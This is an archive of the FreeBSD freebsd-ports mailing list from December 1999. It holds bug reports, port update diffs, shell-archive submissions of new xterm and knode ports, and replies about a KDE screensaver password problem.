freefall.freebsd.org (8.9.3/8.9.2) id OAA92130; Fri, 17 Dec 1999 14:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 0DF8714C41; Fri, 17 Dec 1999 13:53:26 -0800 (PST) Message-Id: <19991217215326.0DF8714C41@hub.freebsd.org> Date: Fri, 17 Dec 1999 13:53:26 -0800 (PST) From: kd5ob@mmcable.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15541: KDE screen saver with password protection does not work. Can't get back in. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15541 >Category: ports >Synopsis: KDE screen saver with password protection does not work. Can't get back in. >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 14:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Charlie Ebert >Release: 3.3 >Organization: Self >Environment: FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0. Thu Sep 16 23:40:35 GMT 1999 jk h@highway.cdrom.com:/usr/src/sys/compile/GENERIC i386 >Description: StartX using KDE interface. Set up any KDE screensaver with password protection. Wait for screensaver to come on. Attempt to re-enter desktop by entering your password. You can't re-enter as it doesn't seem to be hooked up to the password database. >How-To-Repeat: Use any KDE screensaver with password protection. Allow screensaver to come on. Attempt to re-access desktop by using your password. >Fix: Somewhere we are either not hooking KDE up to the FreeBSD passwords for the user accounts OR perhaps, KDE can't read these password files? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 14:10: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B00515468 for ; Fri, 17 Dec 1999 14:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA93594; Fri, 17 Dec 1999 14:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 6C48F15786; Fri, 17 Dec 1999 14:01:01 -0800 (PST) Message-Id: <19991217220101.6C48F15786@hub.freebsd.org> Date: Fri, 17 Dec 1999 14:01:01 -0800 (PST) From: kd5ob@mmcable.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15543: Samba + DHCP = UNKNOWN HOST NAME Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15543 >Category: ports >Synopsis: Samba + DHCP = UNKNOWN HOST NAME >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 14:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Charlie Ebert >Release: 3.3 FreeBSD >Organization: Self >Environment: FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23;40;35 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386 >Description: When using DHCP, Samba can't see to resove MY hostname. >How-To-Repeat: I did a network install of 3.3 FreeBSD, I'm a newbie. Selected DHCP for my TCP-IP protocal to use over the net. When I installed SAMBA during post install proceedures, I used very simple FreeBSD install instrucitons. I've used Samba before on Linux so somewhat framiliar. I have kd5ob in my hosts file as my hostname 10.0.0.1 kd5ob When you run the testconfig program as described in Samba manual for smb.conf you see it's telling you can't resolve hostname. Further attempting to start samba.sh shows no error message yet my service isn't listed anywhere on any other NT machine. >Fix: I don't have enough experience with DHCP to know what's going on. I have a host name of kd5ob entered in my hosts file.... I just don't know. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 15:30: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CE40E14DA3 for ; Fri, 17 Dec 1999 15:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA98929; Fri, 17 Dec 1999 15:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from chain.freebsd.os.org.za (chain.freebsd.os.org.za [196.7.162.242]) by hub.freebsd.org (Postfix) with ESMTP id 7EBB314A24 for ; Fri, 17 Dec 1999 15:29:37 -0800 (PST) (envelope-from khetan@chain.freebsd.os.org.za) Received: by chain.freebsd.os.org.za (Postfix, from userid 1000) id A73B535627; Sat, 18 Dec 1999 01:07:25 +0200 (SAST) Message-Id: <19991217230725.A73B535627@chain.freebsd.os.org.za> Date: Sat, 18 Dec 1999 01:07:25 +0200 (SAST) From: khetan@freebsd.os.org.za Reply-To: khetan@freebsd.os.org.za To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15544: Update of Postfix port from pl02 to pl09 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15544 >Category: ports >Synopsis: Postfix port should be updated from pl02 to pl09 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 15:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Khetan H. Gajjar >Release: FreeBSD 4.0-CURRENT i386 >Organization: private >Environment: n/a >Description: The Postfix port is still using pl02, whereas pl09 (the latest stable version) has been out for a while now. >How-To-Repeat: n/a >Fix: Apply diffs listed below. *** Makefile.orig Sat Dec 18 01:03:29 1999 --- Makefile Sat Dec 18 01:03:42 1999 *************** *** 6,13 **** # $FreeBSD: ports/mail/postfix/Makefile,v 1.9 1999/09/10 21:48:58 torstenb Exp $ # ! DISTNAME= postfix-19990906-pl02 ! PKGNAME= postfix-19990906.02 CATEGORIES= mail MASTER_SITES= ftp://ftp.merit.edu/postfix/official/ \ ftp://ftp.snoopy.net/pub/mirrors/postfix/official/ \ --- 6,13 ---- # $FreeBSD: ports/mail/postfix/Makefile,v 1.9 1999/09/10 21:48:58 torstenb Exp $ # ! DISTNAME= postfix-19990906-pl09 ! PKGNAME= postfix-19990906.09 CATEGORIES= mail MASTER_SITES= ftp://ftp.merit.edu/postfix/official/ \ ftp://ftp.snoopy.net/pub/mirrors/postfix/official/ \ *** md5.orig Sat Dec 18 01:04:18 1999 --- md5 Sat Dec 18 01:04:31 1999 *************** *** 1 **** ! MD5 (postfix-19990906-pl02.tar.gz) = 7d712bc007bcb05728347cb6a3fbd2be --- 1 ---- ! MD5 (postfix-19990906-pl09.tar.gz) = f56882fa0a53b303f6f0d707aa73acf5 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 15:40: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D9B5E14D9C for ; Fri, 17 Dec 1999 15:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA99447; Fri, 17 Dec 1999 15:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from news-ma.rhein-neckar.de (news-ma.rhein-neckar.de [193.197.90.3]) by hub.freebsd.org (Postfix) with ESMTP id CC3FD14C22 for ; Fri, 17 Dec 1999 15:31:22 -0800 (PST) (envelope-from naddy@bigeye.rhein-neckar.de) Received: from bigeye.rhein-neckar.de (uucp@localhost) by news-ma.rhein-neckar.de (8.8.8/8.8.8) with bsmtp id AAA26750 for FreeBSD-gnats-submit@freebsd.org; Sat, 18 Dec 1999 00:31:18 +0100 (CET) (envelope-from naddy@bigeye.rhein-neckar.de) Received: (from naddy@localhost) by bigeye.rhein-neckar.de (8.9.3/8.9.3) id XAA02336; Fri, 17 Dec 1999 23:57:06 +0100 (CET) (envelope-from naddy) Message-Id: <199912172257.XAA02336@bigeye.rhein-neckar.de> Date: Fri, 17 Dec 1999 23:57:06 +0100 (CET) From: Christian Weisgerber Reply-To: naddy@mips.rhein-neckar.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15545: new port: x11/xterm Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15545 >Category: ports >Synopsis: new port: x11/xterm >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 15:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Christian Weisgerber >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: X11 >Description: In between releases of XFree86, Thomas Dickey keeps producing updated versions of xterm. This is a port of the current version from Thomas' home page. Its major new feature over the stock xterm from XFree86 3.3.5 is the addition of UTF-8 support. Unicode for the masses! It also adds flexibility to the handling of the insane backspace/delete issue. To avoid collisions with XFree86, this port installs into ${LOCALBASE}. >How-To-Repeat: n/a >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # xterm # xterm/pkg # xterm/pkg/PLIST # xterm/pkg/DESCR # xterm/pkg/COMMENT # xterm/files # xterm/files/md5 # xterm/patches # xterm/patches/patch-aa # xterm/Makefile # echo c - xterm mkdir -p xterm > /dev/null 2>&1 echo c - xterm/pkg mkdir -p xterm/pkg > /dev/null 2>&1 echo x - xterm/pkg/PLIST sed 's/^X//' >xterm/pkg/PLIST << 'END-of-xterm/pkg/PLIST' Xbin/xterm Xbin/resize Xlib/X11/app-defaults/XTerm Xlib/X11/app-defaults/XTerm-color END-of-xterm/pkg/PLIST echo x - xterm/pkg/DESCR sed 's/^X//' >xterm/pkg/DESCR << 'END-of-xterm/pkg/DESCR' XThe xterm program is a terminal emulator for the X Window System. XIt provides DEC VT102/VT220 (VTxxx) and Tektronix 4014 compatible Xterminals for programs that can't use the window system directly. XThis version adds Unicode (UTF-8) support. X XWWW: http://www.clark.net/pub/dickey/xterm/xterm.html X X- Christian "naddy" Weisgerber X naddy@mips.rhein-neckar.de END-of-xterm/pkg/DESCR echo x - xterm/pkg/COMMENT sed 's/^X//' >xterm/pkg/COMMENT << 'END-of-xterm/pkg/COMMENT' XA newer version of xterm END-of-xterm/pkg/COMMENT echo c - xterm/files mkdir -p xterm/files > /dev/null 2>&1 echo x - xterm/files/md5 sed 's/^X//' >xterm/files/md5 << 'END-of-xterm/files/md5' XMD5 (xterm-121.tgz) = ee165659d1f39300204a472534a2b629 END-of-xterm/files/md5 echo c - xterm/patches mkdir -p xterm/patches > /dev/null 2>&1 echo x - xterm/patches/patch-aa sed 's/^X//' >xterm/patches/patch-aa << 'END-of-xterm/patches/patch-aa' X--- xterm.h.orig Sat Sep 18 18:15:02 1999 X+++ xterm.h Thu Sep 23 17:24:25 1999 X@@ -43,6 +43,9 @@ X X #ifdef HAVE_CONFIG_H X #include X+#if defined(HAVE_TERMIOS_H) && defined(HAVE_TCGETATTR) X+#define USE_POSIX_TERMIOS X+#endif X #endif X X #ifndef GCC_UNUSED END-of-xterm/patches/patch-aa echo x - xterm/Makefile sed 's/^X//' >xterm/Makefile << 'END-of-xterm/Makefile' X# New ports collection makefile for: xterm X# Version required: Patch #121 X# Date created: 1999-07-28 X# Whom: Christian Weisgerber X# X# $FreeBSD$ X XDISTNAME= xterm-121 XCATEGORIES= x11 XMASTER_SITES= ftp://ftp.clark.net/pub/dickey/xterm/ XEXTRACT_SUFX= .tgz X XMAINTAINER= naddy@mips.rhein-neckar.de X XUSE_XLIB= yes XGNU_CONFIGURE= yes XCONFIGURE_ARGS= --enable-wide-chars XMAN1= xterm.1 resize.1 X X.include END-of-xterm/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 16:38:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AC74714E41; Fri, 17 Dec 1999 16:38:03 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA02895; Fri, 17 Dec 1999 16:38:03 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Fri, 17 Dec 1999 16:38:03 -0800 (PST) From: Message-Id: <199912180038.QAA02895@freefall.freebsd.org> To: jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org, torstenb@FreeBSD.org Subject: Re: ports/15544: Postfix port should be updated from pl02 to pl09 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Postfix port should be updated from pl02 to pl09 Responsible-Changed-From-To: freebsd-ports->torstenb Responsible-Changed-By: jedgar Responsible-Changed-When: Fri Dec 17 16:36:27 PST 1999 Responsible-Changed-Why: Over to maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 16:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 883EE14E41 for ; Fri, 17 Dec 1999 16:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA03719; Fri, 17 Dec 1999 16:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 17 Dec 1999 16:50:02 -0800 (PST) Message-Id: <199912180050.QAA03719@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Chris Piazza Subject: Re: ports/15541: KDE screen saver with password protection does not work. Can't get back in. Reply-To: Chris Piazza Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15541; it has been noted by GNATS. From: Chris Piazza To: kd5ob@mmcable.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: ports/15541: KDE screen saver with password protection does not work. Can't get back in. Date: Fri, 17 Dec 1999 16:46:25 -0800 On Fri, Dec 17, 1999 at 01:53:26PM -0800, kd5ob@mmcable.com wrote: > > >How-To-Repeat: > Use any KDE screensaver with password protection. > Allow screensaver to come on. > Attempt to re-access desktop by using your password. > > >Fix: > Somewhere we are either not hooking KDE up to the FreeBSD passwords > for the user accounts OR perhaps, KDE can't read these password files? I've never had a problem with this feature, and I know a lot of people that use KDE and FreeBSD who also don't. I'm not sure what's going on here...sorry. -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 18:35: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7115414F4E; Fri, 17 Dec 1999 18:35:07 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA12396; Fri, 17 Dec 1999 18:35:07 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 18:35:07 -0800 (PST) From: Message-Id: <199912180235.SAA12396@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, asami@FreeBSD.org Subject: Re: ports/15495: Add "addsum" target to bsd.port.mk Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Add "addsum" target to bsd.port.mk Responsible-Changed-From-To: freebsd-ports->asami Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 18:34:37 PST 1999 Responsible-Changed-Why: Satoshi is the maintainer of this file. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 7:37:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pis.toba-cmt.ac.jp (pis.toba-cmt.ac.jp [202.26.248.77]) by hub.freebsd.org (Postfix) with ESMTP id 2E46B14C3C for ; Sat, 18 Dec 1999 07:37:20 -0800 (PST) (envelope-from kiri@pis.toba-cmt.ac.jp) Received: from kiri.pis (localhost [127.0.0.1]) by pis.toba-cmt.ac.jp (8.9.3/8.9.3) with ESMTP id AAA15695 for ; Sun, 19 Dec 1999 00:34:19 +0900 (JST) (envelope-from kiri@pis.toba-cmt.ac.jp) Message-Id: <199912181534.AAA15695@pis.toba-cmt.ac.jp> Date: Sun, 19 Dec 1999 00:34:18 +0900 From: kiri@pis.toba-cmt.ac.jp To: freebsd-ports@FreeBSD.org Subject: Whats' the defference *-devel and *-current? User-Agent: Wanderlust/1.0.3 (Notorious) SEMI/1.13.3 (Komaiko) FLIM/1.12.5 (Hirahata) MULE XEmacs/21.1 (patch 8) (Bryce Canyon) (i386--freebsd) MIME-Version: 1.0 (generated by SEMI 1.13.3 - "Komaiko") Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all. I'm intended to now developping(beta version) applications' ports. Whats' name should be like those ports? *-devel or *-current? Each names takes now as follows: kiri@kiri:/usr/ports/current[1279]% find . -name "*-devel" -type d ./devel/crossm68k-devel ./devel/pth-devel ./lang/gcc-devel ./shells/zsh-devel ./x11-wm/afterstep-devel kiri@kiri:/usr/ports/current[1280]% find . -name "*-current" -type d ./editors/flim-emacs-current ./editors/flim-emacs20-current ./editors/flim-mule-current ./editors/flim-xemacs-current ./editors/flim-xemacs-mule-current ./editors/flim-xemacs20-current ./editors/semi-emacs-current ./editors/semi-emacs20-current ./editors/semi-mule-current ./editors/semi-xemacs-current ./editors/semi-xemacs-mule-current ./editors/semi-xemacs20-current ./editors/wemi-emacs-current ./editors/wemi-emacs20-current ./editors/wemi-mule-current ./editors/wemi-xemacs-current ./editors/wemi-xemacs-mule-current ./editors/wemi-xemacs20-current ./japanese/lynx-current ./mbone/sdr-current ./www/lynx-current To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 7:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B721C14F95 for ; Sat, 18 Dec 1999 07:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA17815; Sat, 18 Dec 1999 07:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 6CF7314C8F for ; Sat, 18 Dec 1999 07:46:16 -0800 (PST) (envelope-from dima@netserv1.chg.ru) Received: (from dima@localhost) by netserv1.chg.ru (8.9.3/8.9.3) id SAA17240; Sat, 18 Dec 1999 18:46:06 +0300 (MSK) Message-Id: <199912181546.SAA17240@netserv1.chg.ru> Date: Sat, 18 Dec 1999 18:46:06 +0300 (MSK) From: Dmitry Sivachenko Reply-To: dima@Chg.RU To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15550: Please update www/calamaris Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15550 >Category: ports >Synopsis: Please update www/calamaris >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 18 07:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dmitry Sivachenko >Release: FreeBSD 3.2-RELEASE i386 >Organization: >Environment: >Description: Please update www/calamaris to the current version. I am the maintainer. >How-To-Repeat: >Fix: diff -Nur calamaris.old/Makefile calamaris/Makefile --- calamaris.old/Makefile Sat Dec 18 18:42:20 1999 +++ calamaris/Makefile Sat Dec 18 18:43:10 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: calmaris -# Version required: 2.27 +# Version required: 2.29 # Date created: 25 December 1998 # Whom: Dima Sivachenko # # $FreeBSD: ports/www/calamaris/Makefile,v 1.8 1999/08/31 02:42:43 peter Exp $ # -DISTNAME= calamaris-2.27 +DISTNAME= calamaris-2.29 CATEGORIES= www textproc MASTER_SITES= http://calamaris.cord.de/ \ ftp://ftp.gpad.ac.ru/pub/FreeBSD/distfiles/ diff -Nur calamaris.old/files/md5 calamaris/files/md5 --- calamaris.old/files/md5 Sat Dec 18 18:42:20 1999 +++ calamaris/files/md5 Sat Dec 18 18:43:16 1999 @@ -1 +1 @@ -MD5 (calamaris-2.27.tar.gz) = f1195fcce7a8212edca399197d675c51 +MD5 (calamaris-2.29.tar.gz) = baf74552c3ea4025cdfae5e85b8797e7 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 7:54: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9C9DD14F68; Sat, 18 Dec 1999 07:54:06 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA18458; Sat, 18 Dec 1999 07:54:06 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Sat, 18 Dec 1999 07:54:06 -0800 (PST) From: Message-Id: <199912181554.HAA18458@freefall.freebsd.org> To: billf@FreeBSD.org, freebsd-ports@FreeBSD.org, billf@FreeBSD.org Subject: Re: ports/15550: Please update www/calamaris Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Please update www/calamaris Responsible-Changed-From-To: freebsd-ports->billf Responsible-Changed-By: billf Responsible-Changed-When: Sat Dec 18 07:53:47 PST 1999 Responsible-Changed-Why: I will do this after the thaw. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 9:29: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cyrius.linf.unb.br (cyrius.linf.unb.br [164.41.12.4]) by hub.freebsd.org (Postfix) with ESMTP id C8A4114E9B for ; Sat, 18 Dec 1999 09:28:54 -0800 (PST) (envelope-from lioux@linf.unb.br) Received: from antares.linf.unb.br [164.41.12.3] by cyrius.linf.unb.br with esmtp id 11zDHq-000EoW-00; Sat, 18 Dec 1999 04:24:14 -0200 Received: (from lioux@localhost) by antares.linf.unb.br (8.8.4/8.8.5) id PAA08921; Sat, 18 Dec 1999 15:19:04 -0200 (EDT) From: Message-Id: <199912181719.PAA08921@antares.linf.unb.br> Subject: Re: ports/15541: KDE screen saver with password protection does not work. Can't get back in. To: cpiazza@jaxon.net Date: Sat, 18 Dec 1999 15:19:03 -0200 (EDT) Cc: freebsd-ports@FreeBSD.org In-Reply-To: <199912180050.QAA03719@freefall.freebsd.org> from "Chris Piazza" at Dec 17, 99 04:50:02 pm X-Mailer: ELM [version 2.4 PL24 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > >How-To-Repeat: > > Use any KDE screensaver with password protection. > > Allow screensaver to come on. > > Attempt to re-access desktop by using your password. > > > > >Fix: > > Somewhere we are either not hooking KDE up to the FreeBSD passwords > > for the user accounts OR perhaps, KDE can't read these password files? > > I've never had a problem with this feature, and I know a lot of people > that use KDE and FreeBSD who also don't. I'm not sure what's going on > here...sorry. Check the PR relating to the latest update of the kdebase. There were some modifications on the permissions of some files. Unfortunaly, I was unable to verify if all of them were needed or if the suid bit is safe on all those files. Nevertheless, you probably have either an old ports tree with an old KDE 1.2 port or an old package. Just change the permissions according to the port file and everything should be fine. Regards, Mario Ferreira ps: I can submit a simple sh script to be placed on the FAQ for reference if need be. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 9:40: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B6DAC14FC1 for ; Sat, 18 Dec 1999 09:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA24992; Sat, 18 Dec 1999 09:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 18 Dec 1999 09:40:01 -0800 (PST) Message-Id: <199912181740.JAA24992@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Subject: Re: ports/15541: KDE screen saver with password protection does not work. Can't get back in. (fwd) Reply-To: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15541; it has been noted by GNATS. From: To: freebsd-gnats-submit@FreeBSD.ORG Cc: Subject: Re: ports/15541: KDE screen saver with password protection does not work. Can't get back in. (fwd) Date: Sat, 18 Dec 1999 15:20:14 -0200 (EDT) Forwarded message: From lioux Sat Dec 18 15:19:03 1999 Subject: Re: ports/15541: KDE screen saver with password protection does not work. Can't get back in. To: cpiazza@jaxon.net Date: Sat, 18 Dec 1999 15:19:03 -0200 (EDT) Cc: freebsd-ports@FreeBSD.org In-Reply-To: <199912180050.QAA03719@freefall.freebsd.org> from "Chris Piazza" at Dec 17, 99 04:50:02 pm X-Mailer: ELM [version 2.4 PL24 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 1045 > > >How-To-Repeat: > > Use any KDE screensaver with password protection. > > Allow screensaver to come on. > > Attempt to re-access desktop by using your password. > > > > >Fix: > > Somewhere we are either not hooking KDE up to the FreeBSD passwords > > for the user accounts OR perhaps, KDE can't read these password files? > > I've never had a problem with this feature, and I know a lot of people > that use KDE and FreeBSD who also don't. I'm not sure what's going on > here...sorry. Check the PR relating to the latest update of the kdebase. There were some modifications on the permissions of some files. Unfortunaly, I was unable to verify if all of them were needed or if the suid bit is safe on all those files. Nevertheless, you probably have either an old ports tree with an old KDE 1.2 port or an old package. Just change the permissions according to the port file and everything should be fine. Regards, Mario Ferreira ps: I can submit a simple sh script to be placed on the FAQ for reference if need be. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 11:20: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E4B3314EFA for ; Sat, 18 Dec 1999 11:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA30687; Sat, 18 Dec 1999 11:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from laurin.munich.netsurf.de (laurin.munich.netsurf.de [194.64.166.1]) by hub.freebsd.org (Postfix) with ESMTP id C292614BF8 for ; Sat, 18 Dec 1999 11:16:28 -0800 (PST) (envelope-from klaus.herrmann@gmx.net) Received: from wunderland.own (ns1232.munich.netsurf.de [195.180.235.232]) by laurin.munich.netsurf.de (8.9.3/8.9.3) with SMTP id UAA01224 for ; Sat, 18 Dec 1999 20:16:25 +0100 (MET) Message-Id: <99121820174800.01353@wunderland.own> Date: Sat, 18 Dec 1999 20:17:10 +0100 From: Klaus Herrmann To: FreeBSD-gnats-submit@freebsd.org Subject: ports/15552: port: knode Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15552 >Category: ports >Synopsis: new port (knode) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 18 11:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Klaus Herrmann >Release: FreeBSD 3.4-RC i386 >Organization: --none-- >Environment: >Description: >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # knode # knode/Makefile # knode/files # knode/files/md5 # knode/pkg # knode/pkg/PLIST # knode/pkg/DESCR # knode/pkg/COMMENT # echo c - knode mkdir -p knode > /dev/null 2>&1 echo x - knode/Makefile sed 's/^X//' >knode/Makefile << 'END-of-knode/Makefile' 